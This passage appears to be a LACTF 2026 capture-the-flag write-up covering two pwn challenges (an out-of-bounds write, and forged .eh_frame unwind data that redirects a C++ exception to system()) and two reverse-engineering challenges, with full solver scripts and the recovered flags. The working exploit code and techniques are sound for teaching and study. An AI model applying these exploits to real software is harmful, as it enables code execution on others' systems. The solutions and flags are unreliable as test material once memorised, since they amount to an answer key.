The vulnerability is in `playerMove()`. The bounds check logic is inverted:

```c
if(index >= 0 && index < 9 && board[index] != ' '){
   printf("Invalid move.\n");
}else{
   board[index] = player;
   break;
}
```

The `else` runs when *any* part of the `if` is false, including when `index` is out of bounds (`index < 0` or `index >= 9`). So we get an out-of-bounds write of `'X'` relative to the global `board`.

From `nm` (these are PIE-relative symbol offsets; the relative layout is stable even with ASLR):

* `player` @ `0x4050`
* `computer` @ `0x4051`
* `board` @ `0x4068`

So `board[-23]` targets `computer` because `0x4068 - 0x4051 = 0x17 = 23`. Choose inputs so: `index = (x-1)*3 + (y-1) = -23`, e.g. `x = -7`, `y = 2`.

This overwrites `computer` from `'O'` to `'X'`, making `computer == player == 'X'`. Now when the bot makes a 3-in-a-row of `'X'`, `checkWin()` returns `'X'` and the program treats it as a *player* win and prints the flag.

```python
from pwn import *

r = remote('chall.lac.tf', 30001)

# OOB write: index = (-7-1)*3 + (2-1) = -23
# board[-23] overwrites the 'computer' variable with 'X'
r.sendlineafter(b'row #(1-3): ', b'-7')
r.sendlineafter(b'column #(1-3): ', b'2')

# Play corner to help form a diagonal
r.sendlineafter(b'row #(1-3): ', b'1')
r.sendlineafter(b'column #(1-3): ', b'1')

# Computer completes the 0-4-8 diagonal with 'X' -> player "wins"
r.recvuntil(b'\n')
print(r.recvall(timeout=5).decode())
```

Flag: `lactf{th3_0nly_w1nn1ng_m0ve_1s_t0_p1ay}`

### refraction

#### Description

The binary reads `0x100` bytes from stdin into `__GNU_EH_FRAME_HDR` (the `.eh_frame_hdr` / `.eh_frame` area), then immediately throws a C++ exception (`throw "eh?";`).\
This means our only input is a controlled overwrite of the unwind metadata that libgcc/libstdc++ consults during exception unwinding.

Goal: forge unwind info so the unwinder “finds” a handler that ends up executing `system("cat flag.txt")`.

#### Solution

We overwrite `.eh_frame_hdr` and the beginning of `.eh_frame` with a minimal, valid set of unwind records:

* A forged `.eh_frame_hdr` table with 2 entries:
  * one FDE covering `f()` (where the exception originates)
  * one FDE covering a fake “handler function” range `0x1200..0x1400` (covers both main’s return IP `0x125a` and the chosen landing pad `0x1213`)
* A CIE using augmentation `"zPLR"` so we can provide:
  * a personality (`__gxx_personality_v0`)
  * an LSDA pointer encoding
  * an FDE pointer encoding
* Two FDEs:
  1. **FDE for `f()`**: we make unwinding *pretend* the caller frame is inside our fake handler range, and we prepare registers for the landing pad.
     * `DW_CFA_def_cfa_expression`: sets the *CFA* to point at our command string in the overwrite buffer.
     * `DW_CFA_val_expression` for **RIP**: spoofs the caller RIP into `handler_start+1` so the next frame lookup uses our handler FDE.
     * `DW_CFA_val_expression` for **RSP**: restores the *real* stack pointer (`rbp+16`) so `system()` has plenty of stack space. (If RSP stayed in our tiny `.eh_frame` page, `system()` crashes due to stack underflow.)
  2. **FDE for the handler range**: provides an LSDA that catches `const char*` and sets the landing pad to `0x1213` (`call system@plt` inside `g()`’s catch block).

At the landing pad, empirically `RDI` ends up equal to the CFA-derived value on this target, so `system()` receives a pointer to our command string while still running on the real stack (thanks to the explicit RSP rule).

Run:

* Local: `python3 solve2.py --local`
* Remote: `python3 solve2.py`

Solution code (`solve2.py`):

```python
#!/usr/bin/env python3
from __future__ import annotations

import argparse
import struct
from dataclasses import dataclass

from pwn import context, process, remote


def p8(x: int) -> bytes:
    return struct.pack("<B", x & 0xFF)


def p32(x: int) -> bytes:
    return struct.pack("<I", x & 0xFFFFFFFF)


def p32s(x: int) -> bytes:
    return struct.pack("<i", int(x))


def uleb128(x: int) -> bytes:
    assert x >= 0
    out = bytearray()
    while True:
        b = x & 0x7F
        x >>= 7
        if x:
            out.append(b | 0x80)
        else:
            out.append(b)
            break
    return bytes(out)


def sleb128(x: int) -> bytes:
    out = bytearray()
    more = True
    while more:
        b = x & 0x7F
        x_shifted = x >> 7
        sign_bit = b & 0x40
        more = not ((x_shifted == 0 and sign_bit == 0) or (x_shifted == -1 and sign_bit != 0))
        out.append((b | 0x80) if more else b)
        x = x_shifted
    return bytes(out)


@dataclass(frozen=True)
class VMA:
    # Link-time VMAs. PIE base cancels out for pcrel/datarel computations.
    eh_frame_hdr: int = 0x2010
    eh_frame: int = 0x2048

    f_start: int = 0x11A9
    f_size: int = 0x2F

    # Fake "handler function" range that covers main's IP (0x125a) and our landing pad (0x1213).
    handler_start: int = 0x1200
    handler_size: int = 0x200

    landing_pad: int = 0x1213  # `call system@plt` inside g()'s catch block

    # Useful constants in the binary
    main_ret_after_f: int = 0x125A  # return address after `call f()` in main
    typeinfo_charptr: int = 0x3D40  # _ZTIPKc
    dw_ref_personality: int = 0x4018  # DW.ref.__gxx_personality_v0


def align4(x: int) -> int:
    return (x + 3) & ~3


def build_eh_frame_hdr(*, entries: list[tuple[int, int]]) -> bytes:
    """
    Minimal .eh_frame_hdr (version 1) with a datarel sdata4 table.
    """
    v = VMA()
    hdr = bytearray()
    hdr += p8(0x01)  # version
    hdr += p8(0x1B)  # eh_frame_ptr_enc: DW_EH_PE_pcrel | DW_EH_PE_sdata4
    hdr += p8(0x03)  # fde_count_enc: DW_EH_PE_udata4
    hdr += p8(0x3B)  # table_enc: DW_EH_PE_datarel | DW_EH_PE_sdata4

    # Encoded pointer to .eh_frame (pcrel sdata4, base = this field)
    eh_frame_ptr_field = v.eh_frame_hdr + 4
    hdr += p32s(v.eh_frame - eh_frame_ptr_field)

    # fde_count (udata4)
    hdr += p32(len(entries))

    # Table entries: (initial_location, fde_address), both datarel sdata4.
    data_base = v.eh_frame_hdr
    for initial_loc_vma, fde_vma in entries:
        hdr += p32s(initial_loc_vma - data_base)
        hdr += p32s(fde_vma - data_base)

    # Original header is 0x34 bytes; keep size the same.
    return bytes(hdr).ljust(0x34, b"\x00")


def build_cie_zplr(*, cie_vma: int) -> bytes:
    """
    CIE with:
      - zPLR augmentation
      - personality pointer (indirect pcrel sdata4)
      - LSDA encoding (pcrel sdata4)
      - FDE encoding (pcrel sdata4)
    """
    v = VMA()
    out = bytearray()
    out += p32(0x1C)  # length
    out += p32(0x00000000)  # CIE_id
    out += p8(0x01)  # version
    out += b"zPLR\x00"
    out += uleb128(1)  # code alignment
    out += sleb128(-8)  # data alignment
    out += uleb128(16)  # return reg (RIP)
    out += uleb128(7)  # augmentation data length

    # P: personality encoding
    out += p8(0x9B)  # DW_EH_PE_indirect | DW_EH_PE_pcrel | DW_EH_PE_sdata4
    personality_ptr_field_vma = cie_vma + len(out)
    out += p32s(v.dw_ref_personality - personality_ptr_field_vma)

    # L: LSDA encoding, R: FDE encoding
    out += p8(0x1B)  # LSDA: pcrel sdata4
    out += p8(0x1B)  # FDE pointers: pcrel sdata4

    # Initial CFI: CFA = rsp + 8; RA = [CFA-8]
    out += b"\x0c\x07\x08"  # DW_CFA_def_cfa r7(rsp), 8
    out += b"\x90\x01"  # DW_CFA_offset RIP, 1 * data_align (-8) => CFA-8
    out += b"\x00\x00"  # padding

    assert len(out) == 0x20
    return bytes(out)


def build_lsda_no_handler(*, f_range: int) -> bytes:
    # LPStart omitted, no type table, one call-site entry with landing pad 0 and action 0.
    b = bytearray()
    b += p8(0xFF)  # LPStart omitted
    b += p8(0xFF)  # TType omitted
    b += p8(0x01)  # call-site encoding: uleb128
    call_site = bytearray()
    call_site += uleb128(0)  # start
    call_site += uleb128(f_range)  # length
    call_site += uleb128(0)  # landing pad = 0
    call_site += uleb128(0)  # action = 0
    b += uleb128(len(call_site))
    b += call_site
    return bytes(b)


def build_lsda_handler(*, lsda_vma: int) -> bytes:
    """
    LSDA that catches `const char*` and transfers to VMA().landing_pad.
    """
    v = VMA()
    b = bytearray()

    # LPStart omitted => bases are relative to the FDE's initial_location (handler_start).
    b += p8(0xFF)

    # Type table present; use pcrel sdata4 direct pointer to _ZTIPKc.
    b += p8(0x1B)  # TType encoding: pcrel sdata4
    ttype_off_index = len(b)
    b += p8(0x00)  # placeholder ttype_offset (we keep it 1 byte)
    pos_after_ttype = lsda_vma + len(b)

    b += p8(0x01)  # call-site encoding: uleb128

    # One call-site entry: cover full handler range.
    landing_pad_off = v.landing_pad - v.handler_start
    call_site = bytearray()
    call_site += uleb128(0)  # start
    call_site += uleb128(v.handler_size)  # length
    call_site += uleb128(landing_pad_off)  # landing pad offset
    call_site += uleb128(1)  # action table offset + 1
    b += uleb128(len(call_site))
    b += call_site

    # Action table: catch type #1, then end.
    b += sleb128(1)
    b += sleb128(0)

    # Type table: one entry placed immediately before ttype_base (end of LSDA).
    type_entry_vma = lsda_vma + len(b)
    b += p32s(v.typeinfo_charptr - type_entry_vma)

    # Patch ttype_offset so that ttype_base == end_of_lsda.
    ttype_base = lsda_vma + len(b)
    ttype_offset = ttype_base - pos_after_ttype
    assert 0 <= ttype_offset < 0x80
    b[ttype_off_index] = ttype_offset

    return bytes(b)


def build_fde_for_f(*, cie_vma: int, fde_vma: int, lsda_vma: int, cmd_vma: int) -> bytes:
    v = VMA()
    out = bytearray()

    out += p32(0)  # placeholder length
    cie_ptr_field_vma = fde_vma + len(out)
    out += p32(cie_ptr_field_vma - cie_vma)  # offset back to CIE

    # initial_location (pcrel sdata4)
    initial_loc_field_vma = fde_vma + len(out)
    out += p32s(v.f_start - initial_loc_field_vma)
    out += p32(v.f_size)  # address_range

    # Augmentation length + LSDA pointer
    out += uleb128(4)
    lsda_ptr_field_vma = fde_vma + len(out)
    out += p32s(lsda_vma - lsda_ptr_field_vma)

    # We can't reliably control caller-saved regs like RDI via CFI on all
    # libgcc builds. Empirically, arriving at our landing pad yields RDI==RSP.
    # So: set the caller frame's CFA to point at our command string, spoof the
    # caller RIP into our fake handler range, and then explicitly restore RSP
    # back onto the real stack for system().
    #
    # Unwind IP for f() is typically the return address after `call __cxa_throw`,
    # which is the next instruction at 0x11d8.
    throw_site = 0x11D8

    def expr_rip_plus(delta: int) -> bytes:
        e = bytearray()
        e += p8(0x80) + sleb128(0)  # DW_OP_breg16 (RIP) + 0
        e += p8(0x11) + sleb128(delta)  # DW_OP_consts delta
        e += p8(0x22)  # DW_OP_plus
        return bytes(e)

    # CFA = &cmd (in our overwrite buffer)
    cfa_expr = expr_rip_plus(cmd_vma - throw_site)
    out += p8(0x0F)  # DW_CFA_def_cfa_expression
    out += uleb128(len(cfa_expr))
    out += cfa_expr

    # Spoof caller RIP into our fake handler range so phase 1 consults our handler FDE/LSDA.
    handler_ip = v.handler_start + 1
    rip_expr = expr_rip_plus(handler_ip - throw_site)
    out += p8(0x16)  # DW_CFA_val_expression
    out += uleb128(16)  # reg = RIP (return address column)
    out += uleb128(len(rip_expr))
    out += rip_expr

    # Keep the actual stack pointer on the real stack:
    # rsp = rbp + 16 (standard caller RSP for a frame-pointer function).
    rsp_expr = bytearray()
    rsp_expr += p8(0x76) + sleb128(16)  # DW_OP_breg6 (RBP) + 16
    out += p8(0x16)  # DW_CFA_val_expression
    out += uleb128(7)  # reg = RSP
    out += uleb128(len(rsp_expr))
    out += bytes(rsp_expr)

    while (len(out) - 4) % 4 != 0:
        out += b"\x00"

    out[0:4] = p32(len(out) - 4)
    return bytes(out)


def build_fde_for_handler(*, cie_vma: int, fde_vma: int, lsda_vma: int) -> bytes:
    v = VMA()
    out = bytearray()

    out += p32(0)  # placeholder length
    cie_ptr_field_vma = fde_vma + len(out)
    out += p32(cie_ptr_field_vma - cie_vma)  # offset back to CIE

    initial_loc_field_vma = fde_vma + len(out)
    out += p32s(v.handler_start - initial_loc_field_vma)  # initial_location
    out += p32(v.handler_size)  # address_range

    out += uleb128(4)  # augmentation length
    lsda_ptr_field_vma = fde_vma + len(out)
    out += p32s(lsda_vma - lsda_ptr_field_vma)

    # Match main() prologue (frame pointer) so stack looks sane if unwinding continues.
    out += b"\x0c" + uleb128(6) + uleb128(16)  # DW_CFA_def_cfa rbp, 16
    out += b"\x86" + uleb128(2)  # DW_CFA_offset rbp, CFA-16

    while (len(out) - 4) % 4 != 0:
        out += b"\x00"

    out[0:4] = p32(len(out) - 4)
    return bytes(out)


def build_payload() -> bytes:
    v = VMA()
    payload = bytearray(b"\x00" * 0x100)

    cie_vma = v.eh_frame
    cie = build_cie_zplr(cie_vma=cie_vma)

    fde_f_vma = cie_vma + len(cie)
    lsda_f_vma = 0x20C0
    lsda_h_vma = 0x20D0
    cmd_vma = 0x20F0

    fde_f = build_fde_for_f(cie_vma=cie_vma, fde_vma=fde_f_vma, lsda_vma=lsda_f_vma, cmd_vma=cmd_vma)
    fde_h_vma = align4(fde_f_vma + len(fde_f))
    fde_h = build_fde_for_handler(cie_vma=cie_vma, fde_vma=fde_h_vma, lsda_vma=lsda_h_vma)

    # .eh_frame terminator after last FDE
    term_vma = fde_h_vma + len(fde_h)
    term_vma = align4(term_vma)

    lsda_f = build_lsda_no_handler(f_range=v.f_size)
    lsda_h = build_lsda_handler(lsda_vma=lsda_h_vma)

    eh_hdr = build_eh_frame_hdr(
        entries=[
            (v.f_start, fde_f_vma),
            (v.handler_start, fde_h_vma),
        ]
    )

    def put(vma: int, data: bytes) -> None:
        off = vma - v.eh_frame_hdr
        assert 0 <= off <= 0x100
        assert off + len(data) <= 0x100
        payload[off : off + len(data)] = data

    put(v.eh_frame_hdr, eh_hdr)
    put(cie_vma, cie)
    put(fde_f_vma, fde_f)
    put(fde_h_vma, fde_h)
    put(term_vma, p32(0))
    put(lsda_f_vma, lsda_f)
    put(lsda_h_vma, lsda_h)
    # Pad with spaces so small RIP differences still yield a valid `/bin/sh -c` command.
    put(cmd_vma, b"        cat flag.txt\x00")

    return bytes(payload)


def main() -> None:
    ap = argparse.ArgumentParser()
    ap.add_argument("--host", default="chall.lac.tf")
    ap.add_argument("--port", default=31152, type=int)
    ap.add_argument("--local", action="store_true")
    args = ap.parse_args()

    context.clear(arch="amd64", os="linux")
    payload = build_payload()

    if args.local:
        io = process(["./attachments/chall"])
    else:
        io = remote(args.host, args.port)

    io.send(payload)
    data = io.recvall(timeout=2)
    if data:
        print(data.decode(errors="replace"), end="")


if __name__ == "__main__":
    main()
```

***

## rev

### flag-finder

#### Description

The challenge provides a web UI with a 19x101 checkbox grid. Pressing "Find" serializes the grid as a 1919-character string of `#` (checked) and `.` (unchecked) and tests it against a single huge JavaScript regex in `script.js`.

The regex encodes a nonogram: one set of constraints for each row and each column. Solving the nonogram reveals 3 lines of 3x5 pixel text spelling the flag.

#### Solution

1. Fetch `script.js` from the challenge and extract the `const theFlag = /^...$/;` regex.
2. Parse constraints from the regex.

* Row constraints: after the `(?=^.{1919}$)` marker, there are 19 capturing groups, one per row, that contain `#` and `#{n}` runs separated by `\.+` (at least one `.`). Converting each group into a list of run-lengths gives the row clues.
* Column constraints: at the start of the regex there is a large group of nested `(?=...)` lookaheads. Each leaf lookahead constrains a single column by repeatedly jumping by `WIDTH` (`.{col}X.{WIDTH-1-col}` patterns). Counting the `(?: ... # ... ){n}` pieces yields the run-lengths for that column.

3. Solve the 19x101 nonogram.

* Use a standard nonogram line-solver with DP: for a given line (row or column) with some forced cells (filled/empty/unknown) and a list of runs, enumerate valid placements via dynamic programming and compute which cells are always filled or always empty.
* Propagate row/column deductions until no more changes.
* If cells remain unknown, backtrack (try `#` then `.`) with propagation at each step.

4. Decode the solved grid.

* The text is arranged as 3 bands of 25 characters each.
* For each band, take rows `6*band+1 .. 6*band+5` (5 rows) and columns in 25 blocks of 3 pixels with 1-column gaps: block `k` is columns `4*k+1 .. 4*k+3`.
* Map each 3x5 bitmap to a character (letters plus leetspeak digits/punctuation).

Decoded flag (from the solved grid): `lactf{Wh47_d0_y0u_637_wh3n_y0u_cr055_4_r363x_4nd_4_n0n06r4m?_4_r363x06r4m!}`

Solver (end-to-end: fetch regex, parse clues, solve, render):

```python
#!/usr/bin/env python3
import re
import sys
from functools import lru_cache
from urllib.request import urlopen, Request

WIDTH = 101
HEIGHT = 19
N = WIDTH * HEIGHT

URL = "https://flag-finder.chall.lac.tf/script.js"


def fetch_script() -> str:
    req = Request(URL, headers={"User-Agent": "ctf-solver"})
    with urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_regex(js: str) -> str:
    # Extract between `const theFlag = /` and `$/;`
    m = re.search(r"const\s+theFlag\s*=\s*/\^(.*)\$\/;", js, flags=re.S)
    if not m:
        raise RuntimeError("could not extract regex")
    return "^" + m.group(1) + "$"


def extract_lookaheads(prefix: str):
    # Extract all (?=...) blocks with balanced parentheses.
    out = []
    i = 0
    # Important: lookaheads are nested (there's an outer (?=...) containing many inner (?=...)),
    # so we must allow overlaps and keep scanning inside already-extracted spans.
    while i < len(prefix):
        if not prefix.startswith("(?=", i):
            i += 1
            continue

        j = i
        depth = 0
        k = j
        while k < len(prefix):
            ch = prefix[k]
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth == 0:
                    out.append(prefix[j : k + 1])
                    break
            k += 1
        else:
            raise RuntimeError("unbalanced parentheses while extracting lookahead")

        i = j + 3
    return out


def infer_col_idx(lookahead_content: str) -> int:
    # Find the first (?: ... ) stride group and infer the fixed column index from its leading wildcard length.
    m = re.search(r"\(\?:([^)]*)\)", lookahead_content)
    if not m:
        raise RuntimeError(f"no (?:...) stride found in lookahead: {lookahead_content[:80]}...")
    inside = m.group(1)

    if inside.startswith(".{"):
        m2 = re.match(r"\.\{(\d+)\}", inside)
        if not m2:
            raise RuntimeError(f"failed to parse .{{n}} prefix: {inside[:40]}")
        return int(m2.group(1))
    if inside.startswith("."):
        # Single wildcard '.' means lead=1
        return 1
    if inside.startswith("\\.") or inside.startswith("#"):
        return 0

    raise RuntimeError(f"unrecognized stride prefix: {inside[:40]}")


def parse_runs_from_row_group(group_pat: str):
    runs = []
    i = 0
    while i < len(group_pat):
        if group_pat[i] == "#":
            if i + 1 < len(group_pat) and group_pat[i + 1] == "{":
                j = group_pat.find("}", i + 2)
                if j == -1:
                    raise RuntimeError(f"unterminated #{{n}} in {group_pat}")
                runs.append(int(group_pat[i + 2 : j]))
                i = j + 1
            else:
                runs.append(1)
                i += 1
        else:
            i += 1
    return runs


def parse_runs_from_col_lookahead(lookahead_content: str):
    runs = []
    # Find each (?: ... # ... ) with optional {n} quantifier.
    for m in re.finditer(r"\(\?:[^)]*#[^)]*\)(?:\{(\d+)\})?", lookahead_content):
        n = m.group(1)
        runs.append(int(n) if n else 1)
    return runs


def extract_row_groups(row_part: str):
    # Capturing groups ( ... ) that are not special groups like (?: or (?<= ... )
    # Row groups have no nested parentheses, so this is safe.
    return re.findall(r"\((?!\?)([^()]*)\)", row_part)


def deduce_line(assign, runs):
    L = len(assign)
    mask = (1 << L) - 1

    pref_one = [0] * (L + 1)
    pref_zero = [0] * (L + 1)
    for i, v in enumerate(assign):
        pref_one[i + 1] = pref_one[i] + (1 if v == 1 else 0)
        pref_zero[i + 1] = pref_zero[i] + (1 if v == 0 else 0)

    def has_one(a, b):
        return (pref_one[b] - pref_one[a]) != 0

    def has_zero(a, b):
        return (pref_zero[b] - pref_zero[a]) != 0

    @lru_cache(None)
    def dp(i, pos):
        # Return (union_filled, inter_filled) for suffix starting at pos placing runs[i:]
        if i == len(runs):
            if has_one(pos, L):
                return None
            return (0, 0)

        r = runs[i]
        union_total = 0
        inter_total = None

        max_start = L - r
        for s in range(pos, max_start + 1):
            # empties before run
            if has_one(pos, s):
                continue
            # run cells cannot contain forced empty
            if has_zero(s, s + r):
                continue

            if i != len(runs) - 1:
                # need a gap cell
                if s + r >= L:
                    continue
                if assign[s + r] == 1:
                    continue
                nxt = s + r + 1
            else:
                nxt = s + r

            tail = dp(i + 1, nxt)
            if tail is None:
                continue
            union_tail, inter_tail = tail

            run_bits = ((1 << r) - 1) << s
            union_here = run_bits | union_tail
            inter_here = run_bits | inter_tail

            union_total |= union_here
            inter_total = inter_here if inter_total is None else (inter_total & inter_here)

        if inter_total is None:
            return None
        return (union_total & mask, inter_total & mask)

    res = dp(0, 0)
    if res is None:
        return None

    union_filled, inter_filled = res

    forced = list(assign)
    for j in range(L):
        bit = 1 << j
        can_fill = (union_filled & bit) != 0
        must_fill = (inter_filled & bit) != 0

        if must_fill:
            if forced[j] == 0:
                return None
            forced[j] = 1
        elif not can_fill:
            if forced[j] == 1:
                return None
            forced[j] = 0

    return forced


def solve_nonogram(row_runs, col_runs):
    grid = [[-1] * WIDTH for _ in range(HEIGHT)]

    def propagate():
        changed = True
        while changed:
            changed = False

            # Rows
            for r in range(HEIGHT):
                ded = deduce_line(tuple(grid[r]), tuple(row_runs[r]))
                if ded is None:
                    return False
                if list(ded) != grid[r]:
                    for c in range(WIDTH):
                        if grid[r][c] != ded[c]:
                            grid[r][c] = ded[c]
                            changed = True

            # Columns
            for c in range(WIDTH):
                col = tuple(grid[r][c] for r in range(HEIGHT))
                ded = deduce_line(col, tuple(col_runs[c]))
                if ded is None:
                    return False
                if any(grid[r][c] != ded[r] for r in range(HEIGHT)):
                    for r in range(HEIGHT):
                        if grid[r][c] != ded[r]:
                            grid[r][c] = ded[r]
                            changed = True

        return True

    def find_unknown():
        for r in range(HEIGHT):
            for c in range(WIDTH):
                if grid[r][c] == -1:
                    return (r, c)
        return None

    def backtrack():
        if not propagate():
            return False
        unk = find_unknown()
        if unk is None:
            return True

        r, c = unk
        snapshot = [row[:] for row in grid]

        for v in (1, 0):
            grid[r][c] = v
            if backtrack():
                return True
            # restore
            for rr in range(HEIGHT):
                grid[rr] = snapshot[rr][:]

        return False

    if not backtrack():
        raise RuntimeError("no solution")

    return grid


def render_grid(grid):
    return "\n".join("".join("#" if v == 1 else "." for v in row) for row in grid)


def flatten_grid(grid):
    return "".join("".join("#" if v == 1 else "." for v in row) for row in grid)


def render_bands(grid):
    # Print each of 3 bands (6 rows: 5 glyph rows + descender row) with spaces between glyphs.
    out = []
    for band in range(3):
        y0 = 6 * band + 1
        out.append(f"[band {band} rows {y0}-{y0+5}]")
        for dy in range(6):
            y = y0 + dy
            line = []
            for k in range(25):
                x0 = 4 * k + 1
                block = "".join("#" if grid[y][x] == 1 else " " for x in range(x0, x0 + 3))
                line.append(block)
            out.append(" ".join(line))
        out.append("")
    return "\n".join(out)


def extract_glyphs(grid):
    # 3 bands, 25 glyphs each, 3x5. (Separator rows may contain decoration; ignore them.)
    glyphs = []
    for band in range(3):
        y0 = 6 * band + 1
        for k in range(25):
            x0 = 4 * k + 1
            g = []
            for dy in range(5):
                y = y0 + dy
                g.append("".join("#" if grid[y][x] == 1 else "." for x in range(x0, x0 + 3)))
            glyphs.append(tuple(g))
    return glyphs


def check_candidate(glyphs, name, cand):
    if len(cand) != len(glyphs):
        print(f"[check:{name}] length mismatch: cand={len(cand)} glyphs={len(glyphs)}")
        return False

    mp = {}
    conflicts = []
    for i, ch in enumerate(cand):
        g = glyphs[i]
        if ch in mp and mp[ch] != g:
            conflicts.append((i, ch))
        mp.setdefault(ch, g)

    if conflicts:
        print(f"[check:{name}] conflicts={len(conflicts)} (showing up to 10): {conflicts[:10]}")
        return False

    print(f"[check:{name}] OK")
    return True


def main():
    js = fetch_script()
    full_re = extract_regex(js)

    # Split regex into prefix (column assertions) and row part.
    marker = "(?=^.{1919}$)"
    idx = full_re.find(marker)
    if idx == -1:
        raise RuntimeError("marker not found")

    prefix = full_re[:idx]
    row_part = full_re[idx + len(marker) :]

    # Rows
    row_groups = extract_row_groups(row_part)
    if len(row_groups) != HEIGHT:
        raise RuntimeError(f"expected {HEIGHT} row groups, got {len(row_groups)}")
    row_runs = [parse_runs_from_row_group(g) for g in row_groups]

    # Columns
    all_lookaheads = extract_lookaheads(prefix)
    leaf_lookaheads = []
    for la in all_lookaheads:
        content = la[3:-1]
        if "(?=" in content:
            continue
        leaf_lookaheads.append(content)

    cols_by_idx = {}
    for content in leaf_lookaheads:
        c = infer_col_idx(content)
        cols_by_idx[c] = parse_runs_from_col_lookahead(content)

    if len(cols_by_idx) != WIDTH:
        missing = sorted(set(range(WIDTH)) - set(cols_by_idx))
        raise RuntimeError(f"expected {WIDTH} columns, got {len(cols_by_idx)}; missing={missing[:10]}")

    col_runs = [cols_by_idx[c] for c in range(WIDTH)]

    grid = solve_nonogram(row_runs, col_runs)

    s = flatten_grid(grid)
    if len(s) != N:
        raise RuntimeError("grid length mismatch")

    # Verify against the actual JS regex via Python re (should match exactly).
    # Python and JS regex syntax match for this pattern usage.
    if not re.fullmatch(full_re, s):
        raise RuntimeError("solution grid does not match regex")

    glyphs = extract_glyphs(grid)
    print(render_bands(grid))

    # Sanity-check common candidate transcriptions.
    c1 = "lactf{wh47_do_you_637_wh3n_you_cross_4_r363x_4nd_4_nono6r4m?_4_r363xo6r4m!}"
    c2 = "lactf{what_do_you_get_when_you_cross_a_regex_and_a_nonogram?_a_regexogram!}"
    check_candidate(glyphs, "leet", c1)
    check_candidate(glyphs, "decoded", c2)


if __name__ == "__main__":
    main()
```

### helm hell

#### Description

We are given a Helm chart (`helm-hell.zip`). Rendering it always produces a ConfigMap with `result: "false"`.

#### Solution

The core logic lives in `work/helm-hell/templates/_helpers.tpl`: thousands of `define` blocks that implement a tiny VM using only Go-template/Sprig primitives (`dict`, `set`, `index`, `add`, `sub`, `mod`, etc.).

Even though the final rendered output is always `false`, the VM still performs prefix-dependent work on `.Values.input`. We can exploit a deterministic side channel:

* The VM uses a small tape `sea` (a map keyed by stringified integers).
* Early in execution, `sea["2"]` is set to `1` and later cleared back to `0`.
* The exact **number of executed template statements** and the current **input index** (`logbook`) at the moment `sea["2"]` transitions `1 -> 0` increases when more of the provided input prefix matches the embedded expected flag.

So we:

1. Implement a minimal interpreter for this limited Go-template subset.
2. Execute the entry template `volumeWorker7940` with `provisions = .Values.input`.
3. Stop exactly when `sea["2"]` clears from `1` to `0`, returning `(logbook, steps)`.
4. Recover the flag one character at a time by trying a charset and choosing the character that maximizes `(logbook, steps)` (using constant padding so the program never runs out of input).

Recovered flag: `lactf{t4k1ng_7h3_h3lm_0f_h31m_73mp14t3s}`

**Solver Code**

```python
#!/usr/bin/env python3
"""Solve LACTF 2026: helm hell

The provided Helm chart always renders `false`, but the (obfuscated) template VM
still runs a prefix-checker internally. We exploit a deterministic side channel:
track the moment tape cell `sea["2"]` is cleared from 1 -> 0. The number of
steps executed and the `logbook` (input index) at that moment increases when
more of the flag prefix matches.

This script:
- Parses templates/_helpers.tpl into a tiny Go-template interpreter.
- Executes the entry template until the 1->0 clear event.
- Brute-forces the flag one character at a time by maximizing (logbook, steps).
"""

import re
import string
from dataclasses import dataclass

TPL_PATH = "work/helm-hell/templates/_helpers.tpl"
BLOCK_RE = re.compile(r"\{\{-\s*(.*?)\s*-\}\}")


# -------- Expression parsing --------

def tokenize_expr(s: str):
    toks = []
    i = 0
    n = len(s)
    while i < n:
        c = s[i]
        if c.isspace():
            i += 1
            continue
        if c in "()":
            toks.append(c)
            i += 1
            continue
        if c == '"':
            i += 1
            out = []
            while i < n:
                if s[i] == '"':
                    break
                if s[i] == "\\" and i + 1 < n:
                    out.append(s[i + 1])
                    i += 2
                    continue
                out.append(s[i])
                i += 1
            if i >= n or s[i] != '"':
                raise ValueError(f"unterminated string: {s!r}")
            i += 1
            toks.append(("str", "".join(out)))
            continue
        j = i
        while j < n and (not s[j].isspace()) and s[j] not in "()":
            j += 1
        toks.append(s[i:j])
        i = j
    return toks


def parse_atom(tok):
    if isinstance(tok, tuple) and tok[0] == "str":
        return ("str", tok[1])
    if tok == "true":
        return ("bool", True)
    if tok == "false":
        return ("bool", False)
    if re.fullmatch(r"-?\d+", tok):
        return ("int", int(tok))
    if tok.startswith("$"):
        if "." in tok:
            base, rest = tok.split(".", 1)
            return ("varpath", base, rest.split("."))
        return ("var", tok)
    if tok.startswith("."):
        return ("dot", tok)
    return ("ident", tok)


def parse_expr_tokens(toks, pos=0, stop_at=None):
    terms = []
    n = len(toks)
    while pos < n:
        t = toks[pos]
        if stop_at is not None and t == stop_at:
            break
        if t == "(":
            sub, pos = parse_expr_tokens(toks, pos + 1, stop_at=")")
            if pos >= n or toks[pos] != ")":
                raise ValueError("missing ')'")
            pos += 1
            terms.append(sub)
            continue
        terms.append(parse_atom(t))
        pos += 1

    if not terms:
        return ("nil", None), pos
    if len(terms) == 1:
        # `(dict)` is used to construct empty maps.
        if terms[0][0] == "ident" and terms[0][1] in {"dict"}:
            return ("call", terms[0][1], []), pos
        return terms[0], pos

    head = terms[0]
    if head[0] != "ident":
        raise ValueError(f"call head not ident: {head}")
    return ("call", head[1], terms[1:]), pos


def parse_expr(s: str):
    toks = tokenize_expr(s)
    expr, pos = parse_expr_tokens(toks, 0, stop_at=None)
    if pos != len(toks):
        raise ValueError(f"unconsumed tokens: {toks[pos:]}")
    return expr


def is_empty(v):
    if v is None:
        return True
    if v is False:
        return True
    if v == 0:
        return True
    if v == "" or v == b"":
        return True
    if isinstance(v, (list, dict, tuple, set)) and len(v) == 0:
        return True
    return False


def to_int(v):
    if isinstance(v, bool):
        return 1 if v else 0
    if isinstance(v, int):
        return v
    if isinstance(v, str):
        v = v.strip()
        return 0 if v == "" else int(v, 10)
    return int(v)


def eval_dot(dot, ref: str):
    cur = dot
    if ref == ".":
        return cur
    path = ref[1:].split(".")
    for p in path:
        if isinstance(cur, dict):
            cur = cur.get(p)
        else:
            cur = getattr(cur, p)
    return cur


def eval_expr(expr, vars_, dot):
    t = expr[0]
    if t == "nil":
        return None
    if t == "int":
        return expr[1]
    if t == "str":
        return expr[1]
    if t == "bool":
        return expr[1]
    if t == "var":
        return vars_[expr[1]]
    if t == "varpath":
        cur = vars_[expr[1]]
        for p in expr[2]:
            if isinstance(cur, dict):
                cur = cur.get(p)
            else:
                cur = getattr(cur, p)
        return cur
    if t == "dot":
        return eval_dot(dot, expr[1])
    if t == "ident":
        return expr[1]

    # call
    fn = expr[1]
    args = [eval_expr(a, vars_, dot) for a in expr[2]]

